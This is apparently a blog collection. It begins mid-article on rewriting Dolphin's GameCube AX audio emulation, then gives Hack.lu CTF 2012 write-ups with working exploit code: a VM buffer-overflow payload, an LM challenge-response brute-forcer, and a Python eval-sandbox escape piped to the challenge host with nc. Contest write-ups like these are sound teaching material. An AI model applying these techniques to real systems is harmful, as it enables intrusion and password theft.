, does all the audio processing and mixes the PBs to internal buffers. - Command 04:
MIX_AUXA
, sends the contents of the AUXA buffers to the CPU, receives processed AUXA, and mix it with the main channels. - Command 05:
MIX_AUXB
, same asMIX_AUXA
for AUXB - Command 06:
UPLOAD_LRS
, sends the contents of the main L/R/S channels to the CPU. - Command 0D:
MORE
, read more commands from RAM and start executing them. I suspect this is used for long command lists, but I’ve never seen it used. - Command 0E:
OUTPUT
, interlaces L/R channel, clamp to 16 bits and send to RAM, where it will most likely get picked up by the Audio Interface. - Command 0F:
END
, signals the end of a command list.
A few more commands exist, but these commands are the main things to handle to get audio working in most games I’ve found. Actually, only handling
PBADDR
,PROCESS
,OUTPUT
andEND
should allow about 90% of games to have some of the audio working (without stuff like AUX effects, used for echo/reverb).When AX is done handling a command list, it sends an interrupt to the CPU to signal that it is ready to receive more data. This is very important because it is the only way for the CPU to know that the data it requested to be uploaded from the DSP is actually valid and done copying/processing. Then, at the next 5ms tick, the CPU will send a new command list to the DSP, and the cycle repeats.
Figure 3: Timeline of an AX 5ms frame handling
AX HLE in Dolphin, previous vs. new
DSP HLE was developed at a time when people did not know much about how the Gamecube DSP worked. It was basically a hack to have sound in games, and more hacks were added on top of that hack to try and fix bugs. The AX UCode emulation is probably the most hacky thing in the DSP HLE code. For example, some of the code that is used looks like this:
// TODO: WTF is going on here?!? // Volume control (ramping) static inline u16 ADPCM_Vol(u16 vol, u16 delta) { int x = vol; if (delta && delta < 0x5000) x += delta * 20 * 8; // unsure what the right step is //x += 1 * 20 * 8; else if (delta && delta > 0x5000) //x -= (0x10000 - delta); // this is to small, it's often 1 x -= (0x10000 - delta) * 20 * 16; // if this was 20 * 8 the sounds in Fire Emblem and Paper Mario // did not have time to go to zero before the were closed //x -= 1 * 20 * 16; // make lower limits if (x < 0) x = 0; //if (pb.mixer_control < 1000 && x < pb.mixer_control) x = pb.mixer_control; // does this make // any sense? // make upper limits //if (mixer_control > 1000 && x > mixer_control) x = mixer_control; // maybe mixer_control also // has a volume target? //if (x >= 0x7fff) x = 0x7fff; // this seems a little high //if (x >= 0x4e20) x = 0x4e20; // add a definitive limit at 20 000 if (x >= 0x8000) x = 0x8000; // clamp to 32768; return x; // update volume }
I don’t even know how this code evolved to become what it is displayed here, I just know that it is not a good way to implement AX HLE. Also, some of the design choices in the previous implementation just couldn’t allow for accurate HLE.
The first issue is that the audio emulation pipeline was simply not correct: the AI was completely bypassed, and sound went directly from the DSP to the emulated audio mixer, without being copied to RAM at any time. This “kind of” works but completely breaks CPU audio effects… which aren’t emulated anyway.
Figure 4: Audio emulation pipeline in the previous AX HLE implementation
But the biggest issue is the timing on which AX HLE was working. On real hardware, the DSP runs on its own clock. At some point the CPU sends commands to it, it processes all of these commands as fast as possible, and sends a message back to the CPU when it’s done. The CPU copies the processed data, then when it needs more data (in most cases, 5ms later) it sends new commands to the DSP. In the previous AX HLE implementation, none of that was right. What the emulated AX did was:
- As soon as we get the command that specified the sounds that should be mixed, copy the sound data address somewhere.
- Every 5ms send a message to the CPU saying that we processed the commands (even though no commands were processed)
- When the audio backend (ALSA, XAudio, DirectSound) requires more data, AX HLE mixed the sound and returned audio data.
Basically, nothing was right in the timing. That implementation allows for some cool hacks (like having the audio running at full speed even though the game is not running at 100% speed), but it is inaccurate and bug-prone.
When trying to fix the “missing instruments” bug affecting the games I wanted to play, I noticed all these timing issues and thought about rewriting AX HLE (once again… I always wanted to rewrite AX HLE every time I looked at the code). The hack fix (re4d18e3a8b7c) that I found to compensate for the timing issues really did not satisfy me, and knowing more about AX HLE I noticed that rewriting it was actually not as hard as I thought it would be. After working for 24h straight on
new-ax-hle
, I finally got a first working version which had ok sounds and music in Tales of Symphonia.The design in
new-ax-hle
is in my opinion a lot better than the design used in the previous AX HLE:- A DSP Thread is created when the UCode is loaded. This thread will be responsible for all the sound mixing work the DSP does.
- When we get commands from the CPU, we copy the command list to a temporary buffer, and wake up the DSP Thread to tell it we have commands to process.
- The DSP Thread handles the commands, sends a message to the CPU when it’s done, and goes back to sleep.
It is basically the exact same model DSP LLE on Thread (another DSP configuration option in Dolphin) uses, with less synchronization (LLE tries to match the number of cycles executed on CPU and DSP, which causes some extra performance hit). This also kind of matches what happens on the real hardware, using 2 chips instead of 2 threads. However, this also means the audio processing speed is tied to the CPU speed: if the CPU cannot keep up, it won’t send commands often enough and the audio backend won’t receive enough data to avoid stuttering.
Figure 5: Comparison of processing timelines. On the left, previous implementation. On the right, new-ax-hle.
Another change, this time not exactly linked to overall design, is that the
new-ax-hle
now handles most AX commands instead of only the one specifying the first parameter block address like the old AX does. Some of these other commands are used to set up global volume ramping, send data back to the main RAM, mix additional data from the RAM, or output samples to the buffers used by the audio interface. This means new-ax-hle now follows the correct audio emulation pipeline:ARAM -> DSP -> RAM -> AI -> Output
(instead of the pipeline used before:ARAM -> DSP -> Output
). This also means some CPU sound effects like echo, reverb, etc. should work fine.Figure 6: Audio emulation pipeline in the new AX HLE implementation
Overall, the more I fix bugs in
new-ax-hle
, the more I’m amazed the previous AX HLE could work so well. It is a pile of hacks, implementing only 2/19 AX commands (and one of these commands is not even implemented correctly), with a completely wrong timing, and some ugly code that makes no sense. I don’t blame the previous authors of this code - at the time, documentation about the DSP was a lot sparser, and analyzing UCodes had to be done with a text editor because there was no awesome IDA plugin for the GC DSP.Conclusion
At the time I’m writing this article,
new-ax-hle
works a lot better than the previous AX HLE in most Gamecube games, and only a few remaining bugs are known in GC games. The Wii AX code is a bit less mature and is more like a proof of concept: I haven’t really worked a lot on it, and after one or two weeks of bug fixing it should also become pretty much perfect, including Wiimote audio emulation (which was only supported with LLE previously). I’m hoping this code will be merged for 4.0, and I’ll most likely be working on Zelda UCode HLE next (which has a less ugly implementation but has the same design issues as AX).Thanks to Pierre-Marie (
pmderodat@lse
) for his nice Inkscape-made pictures.Hack.lu CTF 2012: Braingathering (500 points)
We fought our way to the main server room. The zombies realized that they run out of humans sooner or later, so they started to build machines to create humans for them to eat. Those machines have a special code which is only known to the zombies. This code is capable of destroying all breeding-machines. Now, it's all up to you to get this code and tell us so that we can destroy all machines. SSH: ctf.fluxfingers.net PORT: 2097 USER: ctf PASS: opPsyuXs7aaxtop credits: 500 +3 (1st), +2 (2nd), +1 (3rd)
Braingathering is an elf32 binary which asks for 3 choices:
- 1) Need Brainz brainz brainz, Zombie huuuungry!
- 2) How much longer till braaaiiiiinz?
- 3) Nooo more brainz! STOP THE BRAINZ!
The two first are not interesting, but the third asks us for a password and compares it with the content of the “killcode”. If the password entered by the user is right, it prints us:
YEAH, now go and submit the killcode so that we can stop other systems as well
So we need to leak this password or to get a shell to print the content of the file “killcode”.
The entry point of the binary is inside the .plt section, which has type NOBITS. If we try to open it in IDA, it will not show us the disassembly, so we must change the section’s type to PROGBITS; then we can see a simple deciphering loop.
; Self-decoding stub: XORs 0x6A1 bytes starting at loc_8048500 with 0x8C.
loc_8048BC1:                            ; CODE XREF: start+1Aj
        mov     eax, offset loc_8048500 ; eax = address of the next byte to decode
        mov     ecx, 6A1h               ; ecx = number of bytes left to decode
loc_8048BCD:                            ; CODE XREF: start-Aj
        xor     byte ptr [eax], 8Ch     ; decode one byte in place
        inc     eax
        dec     ecx
        cmp     ecx, 0
        jg      short loc_8048BCD       ; loop while bytes remain
The binary xors bytes from
0x8048500
to0x8048ba1
with0x8C
, and jumps to0x8048500
, the real entry point. The fix is simple: write a small C program to do the task for us. Now we can open it with IDA, and we can see a switch case with 246 entries: it’s definitely a VM. It’s Friday night, and I was bored, so I decided to write an IDA processor for this VM:
Now we just have to dump the vm from offset
0x2060
to0x2847
, and use this processor: “brain VM CPU: brain”. The first thing the VM does is decipher its own code with xor
0x7A7A
from offset0x50
to0x1050
. Again the solution is to write a simple C program to do the task for us.Ok now we have the full code of the VM!
The only interesting sub is at offset
0x014E
, we can call ask-for-password, it is the sub for the third choice.The problem in this function is that a stack based buffer overflow can occur. It reserves
0x34
(52) bytes on the stack for the buffer, but reads on STDIN0x36
(54), so we can overwrite the return address of this sub inside the VM.0x187 MOV R4, $8000 0x18A MOV R1, $10 0x18D CALL memcpy
The password will be copied to address
0x8000
, and our buffer to0x7000
, to compare them in sub-functionsub_00FC
.The opcode
0x3F
is able to write a buffer to a file descriptor.0x3F opcode, write(*PC, R4, strlen(R4));
So the idea is to put the address of the password in R4 and execute this opcode. The opcode
0x49
is perfect for this task :0x49 mov r4, [PC]
So the payload looks like this:
0x49 0x00 0x80 ; mov r4, 0x8000
0x40 0x01 ; write(STDOUT_FILENO, r4, strlen(R4));
0x53 0x0D 0x70 ; Return address for sub_print_newline (buffer + 0xD), so that the exploit ends cleanly
0x53 0x3E 0x01 ; push 0x013E (@ of sub_print_newline)
0x58 ; ret
"0xFF"*43 ; END VM
0x00 0x70 ; New Address to return (@buffer)
Result:
ctf@braingathering:~$ perl -e'print "3"x34 . "\x49\x00\x80" . "\x40\x01" . "\x53\x0d\x70" . "\x53\x3e\x01" . "\x58" . "\xFF"x40 . "\x00\x70"' > /tmp/payload ctf@braingathering:~$ /home/ctf/braingathering < /tmp/payload ==[ZOMBIE BRAIN AQUIREMENT SYSTEM]== Automated system for braingathering ready. 1) Need Brainz brainz brainz, Zombie huuuungry! 2) How much longer till braaaiiiiinz? 3) Nooo more brainz! STOP THE BRAINZ! X) Nah, I'm going to get my brains somewhere else. ### Warning: Only for authorized zombies ### Please enter teh z0mb13 k1llc0d3: Comparing k1llc0d3 INVALID OMG_VMAP0CALYPS3
Hack.lu CTF 2012: Zombies PPTP (450 points)
Our intel shows us that the Zombies use a MS-PPTP like protocol and luckily we could intercept a challenge-response transmission of one of the Zombie outposts. The important thing for Zombies in this war is mass! Not only brain mass but their mass. So they built their PPTP protocol compatible to all older Zombie soldiers. Luckily our science team could extract the algorithm of the challenge-response system out of a captured Zombie brain … I spare you the details, let's just say it was not a pretty sight. And here comes your part soldier: we need the password of this intercepted transmission. With this password we were finally able to turn this war to our favor. So move your ass soldier and good luck! https://ctf.fluxfingers.net/challenges/pptp.tar.gz credits: 450 +3 (1st), +2 (2nd), +1 (3rd)
The given tarball contains two important things: a Python script implementing two challenge/response algorithms for authentication, and a PCAP dump showing this TCP transmission between two hosts:
start_pptp 200 Ok dead234a1f13beef 200 41787c9f6ffde56919ca3cd8d8944590a9fff68468e2bcb6 incompatible 200 78165eccbf53cdb11085e8e5e3626ba9bdefd5e9de62ce91
In the Python script, the two algorithms are named
response_newTechnologie
andresponse_lm
. From the network dump, we can assume that the first hash sent by the client is fromresponse_newTechnologie
: the server answered it wasincompatible
, so the client tried the older method and sent the second hash, generated withresponse_lm
. The older method is probably more buggy, so let’s work on it first. Here is the implementation:def lm_hash(self, input_password): # only use the first 14 bytes input_password = input_password[0:14] # convert all characters to uppercase chars input_password = input_password.upper() # split given password in two parts via 8 bytes password_part1 = input_password[0:8] # concat two 0 bytes to reach 8 bytes password_part2 = input_password[8:14] + "\0\0" # hash part 1 part1_des = des(password_part1) hash_part1 = part1_des.encrypt(self.constant) # hash part 2 part2_des = des(password_part2) hash_part2 = part2_des.encrypt(self.constant) # concat hash parts output_hash = hash_part1 + hash_part2 # return hash as hex value return binascii.hexlify(output_hash) def response_lm(self, challenge, password): # generate lm_hash for response password_hash = self.lm_hash(password) if len(challenge) != 16: raise ValueError("Challenge has to be 8 byte hex value.") # create three passwords for the response password_res1 = password_hash[0:16] password_res2 = password_hash[12:28] password_res3 = password_hash[28:32] + "000000000000" # response part 1 part1_des = des(binascii.unhexlify(password_res1)) res_part1 = part1_des.encrypt(binascii.unhexlify(challenge)) # response part 2 part2_des = des(binascii.unhexlify(password_res2)) res_part2 = part2_des.encrypt(binascii.unhexlify(challenge)) # response part 3 part3_des = des(binascii.unhexlify(password_res3)) res_part3 = part3_des.encrypt(binascii.unhexlify(challenge)) # create full response and return response = res_part1 + res_part2 + res_part3 return binascii.hexlify(response)
Having worked a lot with MSCHAPv2 in the past, I found this algorithm very similar to MSCHAPv2 but using 2 LM hashes instead of a NTLM hash. The first vulnerability, which is common to MSCHAPv2, is that the third part of the response only uses two variable bytes: the key of the DES algorithm for part 3 always ends with 6 NUL bytes. We can bruteforce these two bytes very easily (65536 DES computations are done in less than 0.1s on a modern computer) and get part of the LM hash of the password. Unfortunately, that is not very useful in this case: the password is too long to bruteforce the whole LM hash, so we can’t do anything with these two bytes.
The second vulnerability is that the key space for the first part of the LM hash is very reduced. First, the input password is converted to uppercase. If we assume that only alphabetical characters are present, that leaves us with only
26^8
(208 billion) possible keys. Still a lot, but manageable on a GPU in several hours. However, we’re in a contest, we can’t reimplement a GPU cracker and wait, we want the breakthrough bonus points! The third vulnerability is that DES takes an 8 character input as the key, but actually only uses 56 bits of that input, discarding the LSB of each character. This means that of the 26 possible alphabetical characters, only 13 need to be tested: the other 13 share the same high 7 bits. This reduces the key space to
13^8
(815 million) possible keys, which can easily be tested with a simple C program on a CPU. The last thing we need is a way to check if the first 8 characters of the passwords match the ones used to generate the hash. If they match, the first part of the LM hash (first 64 bits) will be identical. This means the first part of the response will use an identical key, and because the challenge is constant that implies the first part of the response will be identical. Our bruteforce algorithm is the following:
For each 8 chars password using charset (EAOISCMWGYKQZ) if DES(challenge, DES("Trololol", password)) == 78165eccbf53cdb1 found
And here is a C implementation that finds the first 8 characters of the password, in uppercase, with an unknown LSB, in about 5 minutes on my laptop:
#define CONSTANT "Trololol" #define CHALLENGE "\xde\xad\x23\x4a\x1f\x13\xbe\xef" #define WANTED "x\x16^\xcc\xbfS\xcd\xb1" #define CHARSET "EAOISCMWGYKQZ" #define CHARSETSIZE ((unsigned long)(sizeof (CHARSET))) #define CHARSETSIZE2 ((CHARSETSIZE)*(CHARSETSIZE)) #define CHARSETSIZE4 ((CHARSETSIZE2)*(CHARSETSIZE2)) #define CHARSETSIZE8 ((CHARSETSIZE4)*(CHARSETSIZE4)) #define NSTEPS CHARSETSIZE8 static void build_key(int step, char* buffer) { int idx[8]; for (int i = 0; i < 8; ++i) { idx[i] = step % CHARSETSIZE; step /= CHARSETSIZE; } for (int i = 0; i < 8; ++i) for (int j = 0; j < 8; ++j) buffer[i*8 + j] = (CHARSET[idx[i]] >> (7 - j)) & 1; } int main(void) { char bf_key[64]; char res_key[64]; char final_res[64]; char constant_bits[64]; char challenge_bits[64]; char wanted_bits[64]; for (int i = 0; i < 8; ++i) for (int j = 7; j >= 0; --j) { constant_bits[i * 8 + (7 - j)] = (CONSTANT[i] >> j) & 1; challenge_bits[i * 8 + (7 - j)] = (CHALLENGE[i] >> j) & 1; wanted_bits[i * 8 + (7 - j)] = (WANTED[i] >> j) & 1; } for (int step = 0; step < NSTEPS; ++step) { memcpy(res_key, constant_bits, 64); memcpy(final_res, challenge_bits, 64); build_key(step, bf_key); setkey(bf_key); encrypt(res_key, 0); setkey(res_key); encrypt(final_res, 0); if (!memcmp(final_res, wanted_bits, 64)) { printf("Found: %d\n", step); return 0; } if ((step % 1000000) == 0) printf("Current step: %d\n", step); } return 0; }
According to this, the first 8 chars are (approximately):
"ZOMCIESA"
. Now we can use about the same code to bruteforce the last 6 chars. We just need to be careful to use the right part of the hash to generate the second part of the response. The C code is not very different, so I will just skip this and post the second part:"EOSEMS"
. We can easily check if our answer is valid:>>> PPTP().response_lm('dead234a1f13beef', 'ZOMCIESAEOSEMS') '78165eccbf53cdb11085e8e5e3626ba9bdefd5e9de62ce91'
The hash is exactly the same. Win! However, this is not the key yet: remember that we divided our key space by 4: we only considered uppercase characters (where we should have considered upper and lowercase), and only characters with the LSB equal to 1 (because DES ignored that bit anyway). To get the real password, we can just bruteforce the
4^14
(268 million) different possibilities using the new technology hash, which does not lose information. Here is the script we used, with a small hack to hardcode that the key starts with “ZOMBIES” (this can be deduced easily by a human): import pptp for i in xrange(2**7 * 4**7): n1 = i / 128 n2 = i % 128 s1 = 'ZOMBIES' s2 = s1.lower() s = '' for j in xrange(7): if n2 & 1: s += s1[j] else: s += s2[j] n2 >>= 1 s1 = 'AEOSEMS' s2 = '@DNRDLR' s3 = s1.lower() s4 = s2.lower() for j in xrange(7): l = [s1, s2, s3, s4] s += l[n1 & 3][j] n1 >>= 2 x = pptp.PPTP() if x.response_newTechnologie('dead234a1f13beef', s) == '41787c9f6ffde56919ca3cd8d8944590a9fff68468e2bcb6': print s if (i % 100000) == 0: print i
After one or two minutes of computation (<3 PyPy), we get the real key that we can submit on the website:
ZomBIEsAdOReMS
.Hack.lu CTF 2012: The Sandboxed Terminal (400 points)
Since the zombie apocalypse started people did not stop to ask themselves how the whole thing began. An abandoned military base may lead to answers but after infiltrating the facility you find yourself in front of a solid steel door with a computer attached. Luckily this terminal seems to connect to a Python service on a remote server to reduce load on the small computer. While your team managed to steal the source, they need your Python expertise to hack this service and get the masterkey which should be stored in a file called key. https://ctf.fluxfingers.net:2076/c7238e81667a085963829e452223b47b/sandbox.py credits: 400 +3 (1st), +2 (2nd), +1 (3rd)
The sandbox source file contains the port number to connect to the terminal. A sessions prompts two numbers and an “operator”. These inputs are checked against regular expressions:
^[\d]{0,4}$
for the numbers and^[\W]+$
for the operator (and it must not exceed 1899 bytes). If each matches, then if the operator contains a single quote ('
) the operator is replaced byeval(operator)
. Then,eval(number1 + operator + number2)
is computed and printed. Before all of this, some code wraps builtins in order to prevent imports and uses of
open
andfile
.Our way to display the content of the
key
file was first to find a means to evaluate alphanumerical code from the operator
, and then to bypass the sandbox. The second part was the easiest: open.orig
gives access to the originalopen
builtin, thus executingopen.orig('key').read()
was enough to reach the key. Finding a way to craft alphanumerical characters from the operator was far more difficult. The first thing to notice was that
()!=()
(which evaluates toFalse
) can be used as the number 0, and()==()
(which evaluates toTrue
) can be used as the number 1. From this, one can craft all possible numbers. Then, it is possible to take a minimal character set using Python’s backtick notation to get the string representation of an expression:`()==()`
yields'True'
. With non-printable ASCII chars, hexadecimal characters were available after oneeval
:>>> eval('`"\xfe"`[(()==())<<(()==())<<(()==())]') 'e'
When the global
eval
is used, the given expression is evaluated from code inside the sandbox method, in whichself
is the wrapper of eval
itself! Thus, evaluatingeval('self("0x41")')
will return the content of thea
variable.Using all these principles, it is possible to execute our code using 3 eval stages:
- first, the remote sandboxed terminal receives our bytes: numbers are empty,
and the
operator
contains our payload. The payload contains at least one single quote and theoperator
is evaluated once. With the previous tricks, one can craftself("...hexadecimally escaped bytes...")
- then, the second
eval
evaluatesself(...)
which is equivalent toeval("...escaped bytes..")
, and since we completely control the escaped bytes, and these bytes can cover the full byte range, we can do everything!
Thus, we crafted the payload using the following script:
# Payload generator for the sandboxed terminal (Python 2 only: it relies on
# backtick-repr, on the print statement and on byte strings).
#
# The generated payload contains no alphanumerical character. Evaluated once it
# yields the string  self("\x6f\x70...") ; evaluated a second time it calls
# self (the eval wrapper) on the decoded expression.

def get_num(n):
    '''Return a non-alphanum expression that evaluates to the given number.'''
    if n == 0:
        return '[]==()'     # False, usable as 0
    elif n == 1:
        return '[]!=()'     # True, usable as 1
    else:
        # Sum of n parenthesised True values.
        return '+'.join('([]!=())' for i in range(n))

# Craft "self(""
# Each letter is picked out of the backtick-repr of a non-alphanumerical value.
result = ''.join((
    '`{()==()}`[()==[]]+',          # 's'
    '`"\xfe"`[%s]+' % get_num(4),   # 'e'
    '`()==[]`[%s]+' % get_num(2),   # 'l'
    '`"\xff"`[%s]+' % get_num(4),   # 'f'
    '"(\\""+'                       # '("'
))

# Turn the wanted expression into a string of hexadecimally escaped bytes.
# For every character we emit non-printable bytes whose repr contains the
# characters we need; the two nibbles are carried by the bytes 0xf<hi> and
# 0xf<lo>, and the '.' bytes are padding that keeps the wanted characters
# 6 positions apart in the repr.
result += '`\''
for c in 'open.orig("key").read()':
    o = ord(c)
    hi = 0xf0 | (o >> 4)
    lo = 0xf0 | (o & 0x0f)
    result += '\x01.\x01'
    result += chr(hi) + '..'
    result += chr(lo) + '.....'
# Slice [1:-1:6] of the repr: skips the quotes and keeps every 6th character.
result += '\'`[%s:-(%s):%s]+' % (get_num(1), get_num(1), get_num(6))

# Craft "\")"
result += '"\\\")"'

# Simulate the sandboxed environment.
class Wrapper: pass
self=eval
open_orig = open
open = Wrapper()
open.orig = open_orig

# Print results to stderr for debugging
import sys
print >> sys.stderr, '%s bytes: %s' % (len(result), repr(result))
print >> sys.stderr, '--> %s' % repr(eval(result))
print >> sys.stderr, '--> %s' % repr(eval(eval(result)))

# The service prompts for two numbers and an operator: send two empty numbers,
# then the payload as the operator.
print ''
print ''
print result
Finally, we send the payload to the service:
python2 craft_payload.py | nc ctf.fluxfingers.net 2060
Key:
dafuq_how_did_you_solve_this_nonalpha_thingy
.- first, the remote sandboxed terminal receives our bytes: numbers are empty,
and the
Hack.lu CTF 2012: Mealtime (200 points)
Heading up the steeple gave you and your companion a nice view over the outbreak situation in your city. But it also attracted a lot of unwanted attention. Zombies are surrounding your spot and are looking for an entrance to the building. You obviously need some bait to lure them away so you can flee safely. Solve this challenge to find out which human bodypart zombies like the most. https://ctf.fluxfingers.net/challenges/mealtime.exe credits: 200 +3 (1st), +2 (2nd), +1 (3rd)
The challenge takes a 256 bits key as
argv[1]
, cuts it into 4 64 bits blocks, encrypts it using a modified TEA with a constant 32 bits key (different for each block), then compares the ciphered block to a 64 bits constant block. The goal was to find each 64 bits block independently then concatenate them to get the key. I’ll only detail what we did for one block, the other three blocks were the same with a different key/ciphered block.This Win32 executable used a simple
SeDebugPrivilege
trick to try to stop us from debugging. After patching this, we were able to run it inside a debugger to test if our implementation of the encryption algorithm we reversed was correct. After a lot of failed tries (being tired doesn’t help), we found that this code implemented the same algorithm:void tea(unsigned int* pdw1, unsigned int* pdw2) { unsigned int dw1 = *pdw1, dw2 = *pdw2; unsigned int cipher = 0; int i; for (i = 0; i < 64; ++i) { dw1 += (cipher + 0x78756c66) ^ (dw2 + ((dw2 << 4) ^ (dw2 >> 5))); cipher -= 0x61c88647; dw2 += (cipher + 0x78756c66) ^ (dw1 + ((dw1 << 4) ^ (dw1 >> 5))); } *pdw1 = dw1; *pdw2 = dw2; } int main(void) { unsigned int dw1 = 0x83ffeeea; // first part of input block unsigned int dw2 = 0xec0ac902; // second part of input block tea(&dw1, &dw2); printf("0x%08x 0x%08x\n", dw1, dw2); return 0; }
From there, we could either try to find a vulnerability in the algorithm and write a bruteforcer, or take the “lazy” route: provide a representation of the problem in a DIMACS file and run
cryptominisat
on it to solve the problem automagically. This Python script generated the DIMACS description of the problem (see my blog post about SAT and hash cracking for the CNFGenerator code and the severalcnf_*
functions):gen = CNFGenerator() dw2 = cnf_int(gen, 32) dw1 = cnf_int(gen, 32) cipher = cnf_const(gen, 0) addcst = cnf_const(gen, 0x63737265) subcst = cnf_const(gen, 0x61c88647) for i in xrange(32): cipher_plus = cnf_add(gen, cipher, addcst) sum1 = cnf_add(gen, dw2, cnf_xor(gen, cnf_sll(gen, dw2, 4), cnf_srl(gen, dw2, 5))) dw1 = cnf_add(gen, dw1, cnf_xor(gen, cipher_plus, sum1)) cipher = cnf_sub(gen, cipher, subcst) cipher_plus = cnf_add(gen, cipher, addcst) sum2 = cnf_add(gen, dw1, cnf_xor(gen, cnf_sll(gen, dw1, 4), cnf_srl(gen, dw1, 5))) dw2 = cnf_add(gen, dw2, cnf_xor(gen, cipher_plus, sum2)) cnf_equal(gen, dw1, 0x131af1be) cnf_equal(gen, dw2, 0x4bb34049) print gen.output()
This generates a DIMACS file with 23520 variables and 139232 clauses. CryptoMiniSAT can solve this in about 0.06s, generating correct values for the initial
dw1
anddw2
:615f7a6e 645f6572
.Repeating this technique on the three remaining 64 bits blocks gives us the following key:
--delicious_brainz_are_delicious
.Hack.lu CTF 2012: Donn Beach (500 points)
The famous zombie researcher “Donn Beach” almost created an immunization against the dipsomanie virus. This severe disease leads to the inability to defend against Zombies, later causes a complete loss of memory and finally turns you into one of them. Inexplicably Donn forgot where he put the license key for his centrifuge. Provide him a new one and humanity will owe you a debt of gratitude for fighting one of the most wicked illnesses today. https://ctf.fluxfingers.net/challenges/donn_beach.exe ctf.fluxfingers.net tcp/2055 credits: 500 +3 (1st), +2 (2nd), +1 (3rd)
This Win32 executable starts by asking a name, hashing it and comparing it to a constant, then asks a key, does several computations on it using a VM obfuscated with SSE3 instructions, and compares the result of these computations to four integer constants.
We can safely patch the name hashing and make sure that the name hash value is the constant we want - using hardware breakpoints, we can see that the name itself isn’t used later, but the name hash is. The key is composed of three 32 bits integers, read from stdin like this (in hex):
AAAAAAAA-BBBBBBBB-CCCCCCCC
.Before running code in the VM, the executable initializes the VM state with all the inputs to the algorithm:
- Name hash
- First part of the key (
key1
) - Second part of the key (
key2
) - Third part of the key (
key3
) - Pointer to the current instruction
- Pointer to a constant 256 bytes array
- Stack pointer (points to freshly allocated memory)
After running the VM code, it unpacks these values from the state and stores them back to stack variables. They are then compared to the constant values.
Looking inside the VM code a bit closer for 1 hour, and stepping into it with a debugger, we can notice several interesting things:
- The bytecode is interlaced with the VM code in the binary. The x86 code regularly contains long multi-byte NOPs, in which the VM code is placed. The VM simply ignores any instruction it does not know and skips to the next byte, so it will only execute the instructions from inside the NOPs.
- The VM state is contained in MMX registers
mm0
tomm3
, scrambled. Bytes of each of the VM 8 32 bits registers are shuffled to fill these 4 64 bits registers. - The instruction pointer always goes forward, and there does not seem to be anything that increments it with a non constant increment. This means the VM does not support jumps of any sort, so the logic inside of the VM is very reduced.
The 8 VM registers initially contain the following values:
- Reg 0: Constant 256 bytes array ptr
- Reg 1: Name hash
- Reg 2: key1
- Reg 3: key2
- Reg 4: key3
- Reg 5: 0
- Reg 6: Stack pointer
- Reg 7: EIP
Something also makes our life a lot easier: inside the instruction handlers, to read a register value, the code does not inline the SSE instructions to unshuffle and unpack the register. Instead, it gets a function pointer from a table which contains 8 register read functions (one for each register), and calls that function to get the register value in
mm4
. The same can be observed for register writes. This allows us to very easily notice the instructions reading and writing to registers.Using all of these infos, I started to statically reverse engineer all the instruction handlers present in the binary. After one additional hour of work and a lot of laughs after I was rickrolled by an instruction handler, a disassembler was ready:
"""Disassembler for the bytecode of the Donn Beach VM."""

# Opcode byte -> (mnemonic, instruction length in bytes). A length of 2 means
# the opcode is followed by a single operand byte.
OPCODES = {
    0x11: ("ABORT", 1),
    0x09: ("EXIT", 1),
    0x3E: ("ADD", 2),
    0x0D: ("PUSH", 2),
    0x2A: ("PUSH8", 2),
    0x26: ("MOV", 2),
    0x4C: ("POP", 2),
    0x17: ("XOR", 2),
    0x54: ("MOV", 2),
    0x7D: ("SLL", 2),
    0x2C: ("LOAD8", 2),
    0x3B: ("WRITE8", 2),
    0x1B: ("SLL", 2),
    0x5D: ("SRL", 2),
    0x34: ("MOV", 2),
    0x31: ("AND", 2),
}


def disassemble(code):
    """Return the disassembly of `code` as a list of text lines.

    `code` is a sequence of integers in 0..255 (e.g. a ``bytearray``).
    Bytes that are not a known opcode are skipped one at a time, like the VM
    itself does. A two-byte opcode whose operand is missing because the input
    ends is dropped instead of raising ``IndexError``.
    """
    lines = []
    size = len(code)
    i = 0
    while i < size:
        entry = OPCODES.get(code[i])
        if entry is None:
            i += 1
            continue
        mnemonic, length = entry
        if length == 2:
            if i + 1 >= size:
                break  # truncated instruction at the very end of the input
            lines.append("%s %02x" % (mnemonic, code[i + 1]))
        else:
            lines.append(mnemonic)
        i += length
    return lines


if __name__ == "__main__":
    # Binary mode: the executable must not go through newline translation or
    # text decoding. The bytecode starts at file offset 0x2400.
    with open('donn_beach.exe', 'rb') as exe:
        code = bytearray(exe.read())[0x2400:]
    for line in disassemble(code):
        print(line)
Running it on the binary gives us the following output:
PUSH 00 PUSH 04 PUSH 03 PUSH 02 PUSH8 ff POP 02 PUSH8 08 POP 04 MOV 31 AND 32 ADD 30 LOAD8 53 MOV 31 SRL 34 AND 32 ADD 30 LOAD8 33 SLL 34 XOR 53 MOV 31 SRL 34 SRL 34 AND 32 ADD 30 LOAD8 33 SLL 34 SLL 34 XOR 53 MOV 31 SRL 34 SRL 34 SRL 34 ADD 30 LOAD8 33 SLL 34 SLL 34 SLL 34 XOR 53 POP 01 PUSH 05 PUSH 05 MOV 31 AND 32 ADD 30 LOAD8 53 MOV 31 SRL 34 AND 32 ADD 30 LOAD8 33 SLL 34 XOR 53 MOV 31 SRL 34 SRL 34 AND 32 ADD 30 LOAD8 33 SLL 34 SLL 34 XOR 53 MOV 31 SRL 34 SRL 34 SRL 34 ADD 30 LOAD8 33 SLL 34 SLL 34 SLL 34 XOR 53 POP 04 POP 03 POP 01 PUSH 03 PUSH 05 PUSH 04 PUSH8 08 POP 04 MOV 31 AND 32 ADD 30 LOAD8 53 MOV 31 SRL 34 AND 32 ADD 30 LOAD8 33 SLL 34 XOR 53 MOV 31 SRL 34 SRL 34 AND 32 ADD 30 LOAD8 33 SLL 34 SLL 34 XOR 53 MOV 31 SRL 34 SRL 34 SRL 34 ADD 30 LOAD8 33 SLL 34 SLL 34 SLL 34 XOR 53 POP 04 POP 03 POP 02 POP 01 PUSH 05 PUSH 05 PUSH 03 PUSH 04 PUSH8 ff POP 02 PUSH8 08 POP 04 MOV 31 AND 32 ADD 30 LOAD8 53 MOV 31 SRL 34 AND 32 ADD 30 LOAD8 33 SLL 34 XOR 53 MOV 31 SRL 34 SRL 34 AND 32 ADD 30 LOAD8 33 SLL 34 SLL 34 XOR 53 MOV 31 SRL 34 SRL 34 SRL 34 ADD 30 LOAD8 33 SLL 34 SLL 34 SLL 34 XOR 53 POP 01 POP 02 POP 03 MOV 45 PUSH8 08 POP 00 MOV 52 SLL 50 SRL 20 SRL 20 SRL 20 XOR 25 MOV 54 SRL 50 SLL 40 SLL 40 SLL 40 XOR 45 PUSH8 10 POP 00 MOV 53 SRL 50 SLL 30 XOR 35 MOV 01 XOR 12 XOR 23 XOR 34 XOR 40 